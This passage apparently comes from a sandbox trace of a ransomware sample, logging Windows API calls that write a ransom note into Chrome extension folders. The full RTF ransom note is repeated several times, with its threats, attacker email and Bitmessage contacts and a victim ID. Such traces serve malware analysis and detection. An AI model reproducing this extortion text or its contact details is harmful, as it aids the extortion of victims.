ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß}\x05ÜD3>", lpUsedDefaultChar=0x0) returned 8717 [0297.685] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.747] CloseHandle (hObject=0x294) returned 1 [0297.747] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0297.747] GetLastError () returned 0x2 [0297.747] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh 